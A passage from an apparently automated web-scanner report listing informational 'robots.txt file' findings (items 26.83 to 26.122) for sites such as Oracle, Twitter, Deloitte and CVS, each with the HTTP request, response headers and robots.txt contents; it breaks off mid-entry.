GET /robots.txt HTTP/1.0
Host: reviews.gillettevenus.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 16:45:34 GMT
Content-Length: 195
Connection: close

Sitemap: http://reviews.gillettevenus.com/sitemapindex.xml.gz

User-agent: *
Disallow: /bvs
Disallow: /rev
Disallow: /log
Disallow: /logging
Disallow: /logging?*

User-agent: kalooga
Disallow: /

26.83. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt.legolas-media.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:55:10 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 17:46:59 GMT
ETag: "70100-1b-4a7926b978ac0"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.84. http://rww.readwriteweb.netdna-cdn.com/mt-static/themes/df/rww_global.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rww.readwriteweb.netdna-cdn.com
Path:	/mt-static/themes/df/rww_global.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rww.readwriteweb.netdna-cdn.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Tue, 06 Sep 2011 15:32:47 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Wed, 07 Jul 2010 16:50:17 GMT
ETag: "207-48acef6e5e440"
Content-Length: 519
Vary: Accept-Encoding,User-Agent
Accept-Ranges: bytes

# robots.txt for http://www.readwriteweb.com/

User-agent: *
Disallow: /test/
Disallow: /new/
Disallow: /42/
Disallow: /cgi-bin/

User-agent: Googlebot-Image
Disallow: /

User-agent: 008
Disallow: /

...[SNIP]...

26.85. http://s0.2mdn.net/3232241/Russell_Headline_728x90b_REV.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/3232241/Russell_Headline_728x90b_REV.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 14:58:10 GMT
Expires: Wed, 07 Sep 2011 14:58:10 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

26.86. http://s7.addthis.com/js/addthis_widget.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s7.addthis.com
Path:	/js/addthis_widget.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 09 Aug 2011 12:51:11 GMT
ETag: "f0851f-1b-4aa1204a68dc0"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 16:12:49 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

26.87. http://search.oracle.com/search/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.oracle.com
Path:	/search/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.oracle.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (TG;max-age=0+0;age=0;ecid=195841016765,0)
Content-Length: 63
Accept-Ranges: bytes
Date: Tue, 06 Sep 2011 15:54:25 GMT
Connection: close
Set-Cookie: BIGipServerses_ext_prod_pool=477779860.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/

# /robots.txt for search.oracle.com
User-agent: *
Disallow: /

26.88. http://search.twitter.com/search.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.twitter.com
Path:	/search.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:12:53 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:04:26 GMT
Accept-Ranges: bytes
Content-Length: 45
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:12:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /search
Disallow: /*?

26.89. http://services.krxd.net/pixel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/pixel.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: services.krxd.net

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Tue, 06 Sep 2011 14:57:02 GMT
Last-Modified: Thu, 11 Aug 2011 22:33:52 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
Set-Cookie: ServedBy=logger-b007; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:17:02 GMT
Vary: Accept-Encoding
X-Request-Time: D=185 t=1315321022378162
X-Served-By: logger-b007.krxd.net
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.90. https://shop.oracle.com/store/Database previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://shop.oracle.com
Path:	/store/Database

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shop.oracle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:15:19 GMT
Server: Oracle-Application-Server-10g
Last-Modified: Thu, 04 Mar 2010 14:26:16 GMT
ETag: "17bd8d8-b5-4b8fc308"
Accept-Ranges: bytes
Content-Length: 181
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

#
# To avoid getting errors of bots searching the store, creating a robots.txt file
#
User-agent: * # match all bots
Disallow: /i/ # Don't allow bots to search the images directory

26.91. http://speed.pointroll.com/PointRoll/Media/Banners/Lego/893716/superbrick_300x250_flash_r01.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://speed.pointroll.com
Path:	/PointRoll/Media/Banners/Lego/893716/superbrick_300x250_flash_r01.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 15 Sep 2005 12:53:14 GMT
Accept-Ranges: bytes
ETag: "394b626ff4b9c51:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:11 GMT
Connection: close

User-agent: *
Disallow: /

26.92. http://stats.deloitte.com/b/ss/deloittecomnewplatformprod/1/H.22.1/s09288867821451 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stats.deloitte.com
Path:	/b/ss/deloittecomnewplatformprod/1/H.22.1/s09288867821451

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stats.deloitte.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:02 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "1c01ce-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www391
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.93. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Wed, 31 Aug 2011 21:42:54 GMT
ETag: "81a0179-1a-4abd402b9f380"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Tue, 06 Sep 2011 14:57:04 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

User-agent: *
Disallow: /

26.94. http://tf.nexac.com/media/1809966/na.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tf.nexac.com
Path:	/media/1809966/na.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tf.nexac.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.95. http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thinkwrap.com
Path:	/ourfocus/atg-ecommerce-solutions-partner/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: thinkwrap.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 15:32:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 70
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://thinkwrap.com/sitemap.xml.gz

26.96. http://twitter.com/statuses/user_timeline/CenturyLinkBiz.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/statuses/user_timeline/CenturyLinkBiz.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:47 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:23 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:32:47 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

26.97. http://wingateweb.112.2o7.net/b/ss/winweboracle/1/H.20.3/s05398456470575 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wingateweb.112.2o7.net
Path:	/b/ss/winweboracle/1/H.20.3/s05398456470575

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wingateweb.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:53 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "19d148-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www176
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.98. http://wt.infosys.com/dcsompe1g7xywz12f97ensgi0_4h9t/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wt.infosys.com
Path:	/dcsompe1g7xywz12f97ensgi0_4h9t/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wt.infosys.com

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/plain
Last-Modified: Mon, 01 Aug 2011 07:57:59 GMT
Accept-Ranges: bytes
ETag: "d6fe4ebb2050cc1:baa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:28 GMT
Connection: close

##############################
#
# WebTrends SmartSource Data Collector
# Copyright (c) 1996-2007 WebTrends Inc. All rights reserved.
# $DateTime: 2007/02/02 09:50:38 $
#
######################
...[SNIP]...

26.99. http://www.actonsoftware.com/acton/bn/1227/visitor.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.actonsoftware.com
Path:	/acton/bn/1227/visitor.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.actonsoftware.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"65-1314468226000"
Last-Modified: Sat, 27 Aug 2011 18:03:46 GMT
Content-Type: text/plain
Content-Length: 65
Date: Tue, 06 Sep 2011 15:32:49 GMT
Connection: close

User-agent: *
Disallow: /acton/
Disallow: /company_board.html

26.100. http://www.apture.com/js/apture.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apture.com
Path:	/js/apture.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apture.com

Response

HTTP/1.0 200 OK
Last-Modified: Sat, 03 Sep 2011 01:16:29 GMT
Content-Length: 197
Content-Type: text/plain
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Date: Tue, 06 Sep 2011 15:33:01 GMT

User-agent: *
Disallow: /media/
Disallow: /builderSecret/
Disallow: /createSecret/
Disallow: /pluginSecret/
Disallow: /incrMagicLinkCount/
Disallow: /magiclinks/
Disallow: /createbar/checkscript/

26.101. http://www.atg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atg.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Oct 2010 16:59:21 GMT
ETag: "61212-31c-4928283c56c40"
Content-Type: text/plain; charset=UTF-8
Cache-Control: proxy-revalidate, max-age=7200
Expires: Tue, 06 Sep 2011 17:32:22 GMT
Date: Tue, 06 Sep 2011 15:32:22 GMT
Content-Length: 796
Connection: close

User-agent: *
Disallow: /repositories/ContentCatalogRepository_en/manuals
Disallow: /en/login
Disallow: /atg/internal
Disallow: /atg/monitor
Disallow: /myatg
Disallow: /esupport
Disallow: /portal
Disa
...[SNIP]...

26.102. https://www.atg.com/service/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/service/main.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Oct 2010 16:59:21 GMT
ETag: "61212-31c-4928283c56c40"
Content-Type: text/plain; charset=UTF-8
Cache-Control: proxy-revalidate, max-age=7200
Expires: Tue, 06 Sep 2011 17:37:33 GMT
Date: Tue, 06 Sep 2011 15:37:33 GMT
Content-Length: 796
Connection: close

User-agent: *
Disallow: /repositories/ContentCatalogRepository_en/manuals
Disallow: /en/login
Disallow: /atg/internal
Disallow: /atg/monitor
Disallow: /myatg
Disallow: /esupport
Disallow: /portal
Disa
...[SNIP]...

26.103. http://www.beautyproductsdirect.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beautyproductsdirect.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.beautyproductsdirect.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:24 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Thu, 07 Apr 2011 09:58:21 GMT
ETag: "29a4803-75-4d9d8abd"
Accept-Ranges: bytes
Content-Length: 117
Connection: close
Content-Type: text/plain

# Robots.txt for BPD

User-agent: *
Disallow: /bpddev/
Disallow: /inc/
Disallow: /control_cube/
Disallow: /invoice/

26.104. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigcommerce.com
Path:	/lp/e1-lp-ecommerce.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigcommerce.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: Apache
Last-Modified: Mon, 01 Mar 2010 02:17:27 GMT
ETag: "59-480b3d9b71bc0"
Accept-Ranges: bytes
Content-Length: 89
Cache-Control: max-age=432000
Expires: Sun, 11 Sep 2011 15:32:13 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent:*
Sitemap: http://www.bigcommerce.com/sitemap.xml
Disallow: /partners/seal.php

26.105. https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bigcommerce.com
Path:	/pci-compliant-shopping-cart-software.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bigcommerce.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:26 GMT
Server: Apache
Last-Modified: Mon, 01 Mar 2010 02:17:27 GMT
ETag: "59-480b3d9b71bc0"
Accept-Ranges: bytes
Content-Length: 89
Cache-Control: max-age=432000
Expires: Sun, 11 Sep 2011 15:38:26 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent:*
Sitemap: http://www.bigcommerce.com/sitemap.xml
Disallow: /partners/seal.php

26.106. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:02 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.107. http://www.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:33 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/plain
Via: 1.1 aicache6, 1.1 C aicache6
X-Aicache-OS: 64.210.194.245:80
Keep-Alive: max=20
Content-Length: 121
X-Aicache-OS: 64.210.193.221:80
Connection: close
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:56:34 GMT

# robots.txt file for www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.cnbc.com/sitemap_news.xml

26.108. http://www.csc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:43 GMT
Server: Apache
Last-Modified: Fri, 19 Feb 2010 16:14:54 GMT
Accept-Ranges: bytes
Content-Length: 80
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:57:43 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

Sitemap: http://www.csc.com/sitemap.xml.gz

User-agent: gsa-crawler
Disallow: /

26.109. http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cvs.com
Path:	/CVSApp/promoContent/promoLandingTemplate.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cvs.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:42 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 21:25:52 GMT
Accept-Ranges: bytes
Content-Length: 28
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:45:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: 008
Disallow: /

26.110. https://www.cvs.com/CVSApp/checkout/rx/rx_new_container.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cvs.com
Path:	/CVSApp/checkout/rx/rx_new_container.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cvs.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:30 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 21:25:52 GMT
Accept-Ranges: bytes
Content-Length: 28
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:47:30 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: 008
Disallow: /

26.111. http://www.deloitte.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.deloitte.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Jul 2011 08:33:43 GMT
Accept-Ranges: bytes
ETag: "704778e9123ecc1:e97"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 533
Date: Tue, 06 Sep 2011 15:56:57 GMT
Connection: close

User-agent: *
Disallow: /dtt/
Disallow: /assets/secure/
Disallow: /print/
Disallow: /rss/

User-agent: ia_archiver
Disallow: /

User-agent: ConveraCrawler
Disallow: /

User-agent: Autonom
...[SNIP]...

26.112. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.64.119.47
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.113. http://www.fetchback.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fetchback.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:47:42 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 24 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
Content-Length: 206
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 15:47:42 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007.
## Updated: November 16th 2007.
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Disallow: /adodb495a
Disallow: /adodb5
Disallow: /a
...[SNIP]...

26.114. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Tue, 06 Sep 2011 15:27:53 GMT
Expires: Tue, 06 Sep 2011 15:27:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

26.115. http://www.googleadservices.com/pagead/aclk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 06 Sep 2011 05:52:07 GMT
Date: Tue, 06 Sep 2011 15:31:59 GMT
Expires: Tue, 06 Sep 2011 15:31:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.116. http://www.harbottle.com/hnl/pages/hnl.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.harbottle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:19 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 22 Oct 2008 10:12:08 GMT
ETag: "46988a-8a-c7de0e00"
Accept-Ranges: bytes
Content-Length: 138
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /hnl/preview/
Disallow: /hnl/intranet/
Disallow: /hnl/private/
Disallow: /hint/
Disallow: /genie/
Allow: /

26.117. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imiclk.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (CentOS)
Last-Modified: Tue, 22 Mar 2011 15:09:46 GMT
ETag: "65c069-1a-49f13a27ae280"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close

User-agent: *
Disallow: /

26.118. http://www.linkedin.com/countserv/count/share previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/countserv/count/share

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1162225322"
Last-Modified: Wed, 06 Apr 2011 03:23:47 GMT
Content-Length: 24473
Connection: keep-alive
Date: Tue, 06 Sep 2011 15:33:09 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

26.119. http://www.marykay.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marykay.com

Response

HTTP/1.1 200 OK
Content-Length: 696
Content-Type: text/plain
Last-Modified: Wed, 22 Jun 2011 21:19:13 GMT
Accept-Ranges: bytes
ETag: "d0dcab82231cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=43DEB525412A5F56EAEE74A990E2EC2A; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

# /robots.txt file for http://www.marykay.com/

User-agent: *
Disallow: /AddToBagRedirect.aspx
Disallow: /Customer404.aspx
Disallow: /CustomError.aspx
Disallow: /Gate.aspx
Disallow: /InTouchRed
...[SNIP]...

26.120. http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/portal/seo-landing-page/ecommerce/ecommerce-2.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.netsuite.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 260
Content-Disposition: inline;filename*=utf-8''robots.txt
NS_RTIMER_COMPOSITE: -803733239:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=2056
Date: Tue, 06 Sep 2011 15:32:22 GMT
Connection: close

# These intructions apply to all robots.

User-Agent: *
Disallow: /portal/pdf/tos.pdf
Disallow: /portal/resource/terms_of_service.shtml

#Crawl-Delay: 10

sitemap: http://www.netsuite.com.au/sitema
...[SNIP]...

26.121. http://www.oracle.com/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oracle.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
SS_FRIENDLY_EXT: txt
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=300+0;age=0;ecid=41025994034543250,0:1)
Date: Tue, 06 Sep 2011 15:53:59 GMT
Content-Length: 20509
Connection: close

# /robots.txt for www.oracle.com
User-agent: *
Sitemap: http://www.oracle.com/oracle-sitemap.xml
Sitemap: http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/071488.xml
Disallow: /a
...[SNIP]...

26.122. http://www.readwriteweb.com/enterprise/2010/11/oracle.php previous next

Summary

Severity:	Information
Confidence:	Certain
